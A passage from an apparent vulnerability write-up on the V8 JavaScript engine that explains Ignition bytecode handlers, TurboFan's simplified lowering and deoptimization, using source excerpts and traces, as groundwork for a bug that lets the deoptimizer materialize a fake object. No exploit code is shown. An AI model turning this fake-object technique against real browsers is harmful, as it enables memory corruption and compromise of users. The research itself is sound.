Because after a deoptimization execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (e.g. which bytecode offset?) and how to build a correct frame (e.g. which ignition registers?). To do that, the deoptimizer uses the deoptimization input data built during code generation.
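As a rough mental model (all names below are made up, not V8's actual structures), the deoptimization input data can be thought of as a recipe for rebuilding an interpreter frame:

```python
# Toy model of deoptimization input data: everything the deoptimizer
# needs to rebuild an interpreted frame and resume execution in ignition.
frame_state = {
    'bytecode_offset': 10,    # where in the bytecode to resume
    'registers': {'r0': 43},  # values to restore into ignition registers
    'accumulator': 43,        # the implicit accumulator register
}

def materialize_frame(fs):
    # The deoptimizer materializes each captured value, lays out a fresh
    # interpreted frame, then jumps to the handler at the target offset.
    return (fs['bytecode_offset'], dict(fs['registers']), fs['accumulator'])

materialize_frame(frame_state)
```

The bug discussed here makes code generation record a wrong recipe, which is why the deoptimizer can be tricked into materializing a fake object.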

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

## Internals

To understand this bug, we want to know:

• what is ignition (because we deoptimize back to ignition)
• what is simplified lowering (because that's where the bug is)
• what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

### Ignition

#### Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine: an opcode's inputs and outputs are registers. There is also an accumulator, used as an implicit operand by many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.
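The fetch/dispatch loop can be sketched in a few lines of Python (a deliberately simplified model: opcode numbers are borrowed from the bytecode dump below, but real ignition opcodes have variable-length operands and the handlers are compiled code, not Python functions):

```python
# Toy accumulator-based register machine: fetch the opcode, look up its
# handler in a dispatch table, execute, repeat.
def ldar(state, reg):    state['acc'] = state['regs'][reg]   # Ldar: reg -> accumulator
def add_smi(state, imm): state['acc'] += imm                 # AddSmi: acc += immediate
def star(state, reg):    state['regs'][reg] = state['acc']   # Star: accumulator -> reg

DISPATCH_TABLE = {0x25: ldar, 0x40: add_smi, 0x26: star}

def execute(bytecode, state):
    pc = 0
    while pc < len(bytecode):
        handler = DISPATCH_TABLE[bytecode[pc]]
        handler(state, bytecode[pc + 1])
        pc += 2  # simplification: one single-byte operand per opcode

state = {'acc': 0, 'regs': {0: 5, 1: 0}}
execute([0x25, 0, 0x40, 42, 0x26, 1], state)  # Ldar r0; AddSmi [42]; Star r1
```

After running, r1 holds r0 + 42, which is exactly the shape of the opt_me function below.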

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
  let value = val + 42;
  o.x = value;
}
opt_me({x:1.1});


Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
13 E> 0000017DE515F366 @    0 : a5                StackCheck
41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
0000017DE515F36C @    6 : 26 fb             Star r0
53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
0000017DE515F374 @   14 : 0d                LdaUndefined
67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
- map: 0x00d580740789 <Map>
- length: 1
0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)


Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
- map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10


This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
- code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
- interpreted
- bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...


Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into kInterpreterDispatchTableRegister. It then selects the current opcode using kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and calls the handler. Those registers are described in src/codegen/x64/register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
  // handler at the current bytecode offset.
  Label do_dispatch;
  __ bind(&do_dispatch);
  __ Move(
      kInterpreterDispatchTableRegister,
      ExternalReference::interpreter_dispatch_table_address(masm->isolate()));
  __ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  __ movq(kJavaScriptCallCodeStartRegister,
          Operand(kInterpreterDispatchTableRegister, r11,
                  times_system_pointer_size, 0));
  __ call(kJavaScriptCallCodeStartRegister);
  masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

  // Any returns to the entry trampoline are either due to the return bytecode
  // or the interpreter tail calling a builtin and then a dispatch.

  // Get bytecode array and bytecode offset from the stack frame.
  __ movq(kInterpreterBytecodeArrayRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
  __ movq(kInterpreterBytecodeOffsetRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
  __ SmiUntag(kInterpreterBytecodeOffsetRegister,
              kInterpreterBytecodeOffsetRegister);

  // Either return, or advance to the next bytecode and dispatch.
  Label do_return;
  __ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  __ AdvanceBytecodeOffsetOrReturn(kInterpreterBytecodeArrayRegister,
                                   kInterpreterBytecodeOffsetRegister, rbx, rcx,
                                   &do_return);
  __ jmp(&do_dispatch);


#### Ignition handlers

Ignition handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
  Node* accumulator = GetAccumulator();
  Node* relative_jump = BytecodeOperandUImmWord(0);
  CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
  CSA_ASSERT(this, IsBoolean(accumulator));
  JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}
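To see where such a handler comes into play, consider a function with a simple conditional (an illustrative snippet: for arbitrary conditions the bytecode generator typically emits the ToBoolean jump variants, and the plain JumpIfTrue/JumpIfFalse forms when the input is known to be a boolean):

```javascript
// Illustrative function: the `if` below compiles to Ignition bytecode
// ending in a conditional jump; with a known-boolean condition the
// JumpIfTrue/JumpIfFalse handlers shown above can be used.
function pick(cond) {
  if (cond === true) {
    return "taken";
  }
  return "not taken";
}

console.log(pick(true));  // "taken"
console.log(pick(false)); // "not taken"
```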


Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

void BinaryOpSmiWithFeedback(BinaryOpGenerator generator) {
  Node* lhs = BytecodeOperandImmSmi(0);
  Node* rhs = GetAccumulator();
  Node* context = GetContext();
  Node* slot_index = BytecodeOperandIdx(1);
  Node* maybe_feedback_vector = LoadFeedbackVector();

  BinaryOpAssembler binop_asm(state());
  Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
                                        maybe_feedback_vector, false);
  SetAccumulator(result);
  Dispatch();
}


From this code, we understand that when executing AddSmi [42], [0], V8 ends up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left-hand side of the addition is operand 0 ([42] in this case); the right-hand side is loaded from the accumulator register. The handler also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.
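As a hypothetical illustration: in a function like the one below, the literal 42 is embedded directly in the bytecode as the immediate operand of an AddSmi, while the other operand travels through the accumulator.

```javascript
// The constant 42 becomes the <imm> operand of an AddSmi bytecode;
// the feedback slot named by the second operand records the operand
// types observed so far (e.g. SignedSmall).
function add42(x) {
  return x + 42;
}
console.log(add42(1)); // 43
```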

It is interesting to observe the call to Dispatch. One might expect every handler to be invoked from within the do_dispatch label of InterpreterEntryTrampoline, whereas in fact the current ignition handler dispatches to the next one itself (and thus does not directly go back through do_dispatch).

#### Debugging

There is a built-in feature for debugging ignition bytecode that you can enable by setting v8_enable_trace_ignition to true and recompiling the engine. You may also want to enable v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

• --trace-ignition

There are also a few interesting runtime functions:

• Runtime_InterpreterTraceBytecodeEntry
• prints ignition registers before executing an opcode
• Runtime_InterpreterTraceBytecodeExit
• prints ignition registers after executing an opcode
• Runtime_InterpreterTraceUpdateFeedback
• displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
  return a + b;
}


We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
[          r2 -> 0x3ede813004a9 <undefined> ]
[          r3 -> 42 ]
[          r4 -> 1 ]
-> 0x193680a1fa56 @    0 : a5                StackCheck
-> 0x193680a1fa57 @    1 : 25 02             Ldar a1
[          a1 -> 1 ]
[ accumulator <- 1 ]
-> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
[ accumulator -> 1 ]
[          a0 -> 42 ]
[ accumulator <- 43 ]
-> 0x193680a1fa5c @    6 : a9                Return
[ accumulator -> 43 ]
-> 0x193680a1f83a @   36 : 26 fb             Star r0
[ accumulator -> 43 ]
[          r0 <- 43 ]
-> 0x193680a1f83c @   38 : a9                Return
[ accumulator -> 43 ]


### Simplified lowering

Simplified lowering is actually divided into three main phases:

1. The truncation propagation phase (RunTruncationPropagationPhase)
• backward propagation of truncations
2. The type propagation phase (RunTypePropagationPhase)
• forward propagation of types from type feedback
3. The lowering phase (Run, after calling the previous phases)
• may lower nodes
• may insert conversion nodes
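The first phase can be sketched as a toy worklist pass (purely illustrative: the real phase computes a per-input UseInfo in each node visitor, whereas this sketch applies one use per node):

```javascript
// Toy backward truncation propagation over a tiny node graph:
// start from End, record the truncation its consumer puts on each
// node, and enqueue that node's inputs, mirroring the worklist
// structure of RunTruncationPropagationPhase.
const graph = {
  End:            { inputs: ["Return"],         use: "no-value-use" },
  Return:         { inputs: ["NumberConstant"], use: "truncate-to-word32" },
  NumberConstant: { inputs: [],                 use: null },
};

function propagate(start) {
  const truncations = {};
  const queue = [[start, "no-value-use"]];
  while (queue.length) {
    const [name, trunc] = queue.shift();
    truncations[name] = trunc;
    // each input inherits the use this node declares for its inputs
    for (const input of graph[name].inputs) {
      queue.push([input, graph[name].use]);
    }
  }
  return truncations;
}

console.log(propagate("End"));
// { End: 'no-value-use', Return: 'no-value-use',
//   NumberConstant: 'truncate-to-word32' }
```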

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below:

function f(a) {
  if (a) {
    var x = 2;
  }
  else {
    var x = 5;
  }
  return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);
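Before diving in, a quick sanity check on the ranges that will appear in the traces below: 0x42 is 66, so it is typed Range(66,66); x is either 2 or 5, hence Range(2,5); and the modulus therefore lands in Range(0,4).

```javascript
// 0x42 is 66; with x in {2, 5} the result of 0x42 % x stays in [0, 4].
console.log(0x42);     // 66
console.log(0x42 % 2); // 0
console.log(0x42 % 5); // 1
```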


#### Propagating truncations

To understand how truncations get propagated, we trace the simplified lowering with --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which you can do by selecting the escape analysis phase (the phase right before it) in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
initial #30: no-value-use

void VisitNode(Node* node, Truncation truncation,
               SimplifiedLowering* lowering) {
  // ...
  case IrOpcode::kEnd:
  // ...
  case IrOpcode::kJSParseInt:
    VisitInputs(node);
    // Assume the output is tagged.
    return SetOutput(node, MachineRepresentation::kTagged);


Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use information: the first input is truncated to a word32; the other inputs are not truncated. The output is tagged.

void VisitNode(Node* node, Truncation truncation,
               SimplifiedLowering* lowering) {
  // ...
  switch (node->opcode()) {
    // ...
    case IrOpcode::kReturn:
      VisitReturn(node);
      // Assume the output is tagged.
      return SetOutput(node, MachineRepresentation::kTagged);
    // ...
  }
}

void VisitReturn(Node* node) {
  int tagged_limit = node->op()->ValueInputCount() +
                     OperatorProperties::GetContextInputCount(node->op()) +
                     OperatorProperties::GetFrameStateInputCount(node->op());
  // Visit integer slot count to pop
  ProcessInput(node, 0, UseInfo::TruncatingWord32());

  // Visit value, context and frame state inputs as tagged.
  for (int i = 1; i < tagged_limit; i++) {
    ProcessInput(node, i, UseInfo::AnyTagged());
  }
  // Only enqueue other inputs (effects, control).
  for (int i = tagged_limit; i < node->InputCount(); i++) {
    EnqueueInput(node, i);
  }
}


In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
initial #29: truncate-to-word32
initial #28: no-truncation (but distinguish zeros)
queue #28?: no-truncation (but distinguish zeros)
initial #21: no-value-use


All the inputs (#29, #28, #21) are added to the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)


When visiting node 28, the visitor for SpeculativeNumberModulus decides, in this case, that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
initial #24: truncate-to-word32
initial #23: truncate-to-word32
initial #13: no-value-use
queue #21?: no-value-use


Indeed, if we look at the code of the visitor: both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN() (they are typed as Range(66,66) and Range(2,5)), and although the node truncation is not a word32 truncation (there is no truncation here), the node itself is typed as Type::Unsigned32() (its type is Range(0,4)). The condition is therefore satisfied and a call to VisitWord32TruncatingBinop is made.

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to kWord32 (with a restriction type of Any). It also adds all the remaining inputs to the queue.

void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                   SimplifiedLowering* lowering) {
  if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
      (truncation.IsUsedAsWord32() ||
       NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
    // => unsigned Uint32Mod
    VisitWord32TruncatingBinop(node);
    if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
    return;
  }
  // ...
}

void VisitWord32TruncatingBinop(Node* node) {
  VisitBinop(node, UseInfo::TruncatingWord32(),
             MachineRepresentation::kWord32);
}

// Helper for binops of the I x I -> O variety.
void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
                Type restriction_type = Type::Any()) {
  VisitBinop(node, input_use, input_use, output, restriction_type);
}

// Helper for binops of the R x L -> O variety.
void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
                MachineRepresentation output,
                Type restriction_type = Type::Any()) {
  DCHECK_EQ(2, node->op()->ValueInputCount());
  ProcessInput(node, 0, left_use);
  ProcessInput(node, 1, right_use);
  for (int i = 2; i < node->InputCount(); i++) {
    EnqueueInput(node, i);
  }
  SetOutput(node, output, restriction_type);
}


For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
initial #19: no-value-use
initial #17: no-value-use


It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

void VisitNode(Node* node, Truncation truncation,
               SimplifiedLowering* lowering) {
  // ...
  case IrOpcode::kMerge:
  // ...
  case IrOpcode::kJSParseInt:
    VisitInputs(node);
    // Assume the output is tagged.
    return SetOutput(node, MachineRepresentation::kTagged);


The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
visit #23: Phi (trunc: truncate-to-word32)
initial #20: truncate-to-word32
initial #22: truncate-to-word32
queue #21?: no-value-use
visit #13: JSStackCheck (trunc: no-value-use)
initial #12: no-truncation (but distinguish zeros)
initial #14: no-truncation (but distinguish zeros)
initial #6: no-value-use
initial #0: no-value-use


Now let's have a look at the phi visitor. It simply forwards the propagations to its inputs and adds them to the queue. The output representation is inferred from the phi node's type.

// Helper for handling phis.
void VisitPhi(Node* node, Truncation truncation,
              SimplifiedLowering* lowering) {
  MachineRepresentation output =
      GetOutputInfoForPhi(node, TypeOf(node), truncation);
  // Only set the output representation if not running with type
  // feedback. (Feedback typing will set the representation.)
  SetOutput(node, output);

  int values = node->op()->ValueInputCount();
  if (lower()) {
    // Update the phi operator.
    if (output != PhiRepresentationOf(node->op())) {
      NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
    }
  }

  // Convert inputs to the output representation of this phi, pass the
  // truncation along.
  UseInfo input_use(output, truncation);
  for (int i = 0; i < node->InputCount(); i++) {
    ProcessInput(node, i, i < values ? input_use : UseInfo::None());
  }
}


Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
visit #22: NumberConstant (trunc: truncate-to-word32)


They don't have any inputs to enqueue. Output representation is set to tagged signed.

case IrOpcode::kNumberConstant: {
  double const value = OpParameter<double>(node->op());
  int value_as_int;
  if (DoubleToSmiInteger(value, &value_as_int)) {
    VisitLeaf(node, MachineRepresentation::kTaggedSigned);
    if (lower()) {
      intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
      DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
    }
    return;
  }
  VisitLeaf(node, MachineRepresentation::kTagged);
  return;
}


We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.

Please note that a visitor may behave differently according to the phase currently being executed.

bool lower() const { return phase_ == LOWER; }
bool retype() const { return phase_ == RETYPE; }
bool propagate() const { return phase_ == PROPAGATE; }


That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

#### Retyping

There isn't much to say about the retyping phase. Starting from the End node, every node of the graph is pushed onto a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and the nodes are revisited. This allows updated type information to be propagated forward (starting from Start, rather than End).

As we can observe by tracing the phase, this is when the final output representations are computed and displayed:

 visit #29: NumberConstant
==> output kRepTaggedSigned


For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
visit #23: Phi
==> output kRepWord32

#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
visit #28: SpeculativeNumberModulus
==> output kRepWord32


#### Lowering and inserting conversions

Now that every node has been associated with use information for each input as well as an output representation, the last phase consists of:

• lowering the node itself to a more specific one (via a DeferReplacement for instance)
• converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

Let's go through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of NumberConstant #29 has a kRepTaggedSigned representation. However, the Return node, which uses it as its first input, wants it truncated to word32. Therefore, the node gets converted. This is done by the ConvertInput function, which itself calls the representation changer via GetRepresentationFor. Because a truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor, which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
  return jsgraph()->Int32Constant(DoubleToInt32(value));
}


visit #30: Return
change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
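DoubleToInt32 performs the standard ECMAScript ToInt32 truncation, the same conversion JavaScript itself exposes via the | 0 idiom. A behavioral sketch (not V8's actual implementation):

```javascript
// Sketch of ToInt32-style truncation: keep the low 32 bits of the
// number and reinterpret them as a signed integer. In JavaScript,
// `x | 0` performs exactly this conversion.
function toInt32(x) {
  return x | 0;
}
console.log(toInt32(29));             // 29
console.log(toInt32(4294967296 + 5)); // 5  (2**32 + 5 wraps around)
console.log(toInt32(2147483648));     // -2147483648 (wraps to signed)
```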


For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
else if (IsWord(output_rep)) {
  if (output_type.Is(Type::Signed31())) {
    op = simplified()->ChangeInt31ToTaggedSigned();
  }
  // ...
}


visit #30: Return
change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)
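As an aside, the Smi encoding produced by ChangeInt31ToTaggedSigned is visible in the deoptimization traces later in this article, where 42 appears as 0x002a00000000: on x64 (without pointer compression), a Smi is the 32-bit value shifted into the upper half of the 64-bit word, leaving the low tag bit clear. A quick computation:

```javascript
// x64 Smi encoding (no pointer compression): value << 32. The low
// bit of the resulting word is 0, which tags it as a Smi rather than
// a heap object pointer.
const smi42 = 42n << 32n;
console.log('0x' + smi42.toString(16)); // 0x2a00000000
```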


The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi


If we compare the graph (well, a subset), we can observe :

• the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
• the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
• node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle

This is before simplified lowering:

This is after:

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                   SimplifiedLowering* lowering) {
  if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
      (truncation.IsUsedAsWord32() ||
       NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
    // => unsigned Uint32Mod
    VisitWord32TruncatingBinop(node);
    if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
    return;
  }
  // ...
}

Node* SimplifiedLowering::Uint32Mod(Node* const node) {
  Uint32BinopMatcher m(node);
  Node* const minus_one = jsgraph()->Int32Constant(-1);
  Node* const zero = jsgraph()->Uint32Constant(0);
  Node* const lhs = m.left().node();
  Node* const rhs = m.right().node();

  if (m.right().Is(0)) {
    return zero;
  } else if (m.right().HasValue()) {
    return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
  }

  // General case for unsigned integer modulus, with optimization for (unknown)
  // power of 2 right hand side.
  //
  //   if rhs == 0 then
  //     zero
  //   else
  //     msk = rhs - 1
  //     if rhs & msk != 0 then
  //       lhs % rhs
  //     else
  //       lhs & msk
  //
  // Note: We do not use the Diamond helper class here, because it really hurts
  // readability with nested diamonds.
  const Operator* const merge_op = common()->Merge(2);
  const Operator* const phi_op =
      common()->Phi(MachineRepresentation::kWord32, 2);

  Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
  Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
                                   graph()->start());

  Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
  Node* true0 = zero;

  Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
  Node* false0;
  {
    Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

    Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
    Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

    Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
    Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

    Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
    Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

    if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
    false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
  }

  Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
  return graph()->NewNode(phi_op, true0, false0, merge0);
}
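The pseudo-code in the comment above boils down to the classic power-of-two trick: when rhs is a power of two, rhs & (rhs - 1) is zero and lhs % rhs equals lhs & (rhs - 1). The same logic sketched in JavaScript (for unsigned values, with the rhs == 0 branch returning zero as in the generated graph):

```javascript
// Mirrors the control flow built by SimplifiedLowering::Uint32Mod:
// rhs == 0 yields 0, a power-of-two rhs uses a cheap bitwise mask,
// anything else falls back to a real modulus.
function uint32Mod(lhs, rhs) {
  if (rhs === 0) return 0;
  const msk = rhs - 1;
  if ((rhs & msk) !== 0) {
    return lhs % rhs;   // general case
  }
  return lhs & msk;     // rhs is a power of two
}
console.log(uint32Mod(66, 8)); // 2
console.log(uint32Mod(66, 5)); // 1
console.log(uint32Mod(66, 0)); // 0
```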


### A high level overview of deoptimization

Understanding deoptimization requires studying several components of V8:

• instruction selection
• when descriptors for FrameState and StateValues nodes are built
• code generation
• when deoptimization input data are built (that includes a Translation)
• the deoptimizer
• at runtime, this is where execution is redirected to when "bailing out to deoptimization"
• uses the Translation
• translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kinds of nodes related to deoptimization such as:

• Checkpoint
• refers to a FrameState
• FrameState
• refers to a position and a state, takes StateValues as inputs
• StateValues
• state of parameters, local variables, accumulator
• Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization:

• eager, when you deoptimize the current function on the spot
• you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
• lazy, you deoptimize later
• another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
• soft
• a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is, the constructed output frame is called an interpreted frame. However, there are other kinds of frames which we are not going to discuss in this article (e.g. adaptor frames, builtin continuation frames, etc.). Michael Stanton, a V8 developer, wrote a few interesting blog posts on the subject that you may want to check.

We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data to this optimized code. When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer takes those deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, it returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

#### Tracing a deoptimization

Let's get through a quick experiment using the following script.

function add_prop(x) {
  let obj = {};
  obj[x] = 42;
}
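The script above only defines the function. To actually observe the "wrong name" deoptimization traced below, the function has to be warmed up, optimized, then called with a different property name. A hypothetical driver (the %-prefixed natives require running d8 with --allow-natives-syntax; the return statement is added here purely to make the effect observable):

```javascript
function add_prop(x) {
  let obj = {};
  obj[x] = 42;
  return obj;  // return added for observability in this sketch
}

add_prop("x");                    // feedback now expects the name "x"
// %PrepareFunctionForOptimization(add_prop);  // d8-only natives syntax
// %OptimizeFunctionOnNextCall(add_prop);
add_prop("x");                    // optimized code, assumption holds
const o = add_prop("different");  // "wrong name" => eager deoptimization
console.log(o.different); // 42
```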



Now run it using --turbo-profiling and --print-code-verbose.

This allows us to dump the deoptimization input data:

Deoptimization Input Data (deopt points = 5)
index  bytecode-offset    pc  commands
0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
STACK_SLOT {input=-1}
STACK_SLOT {input=4}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
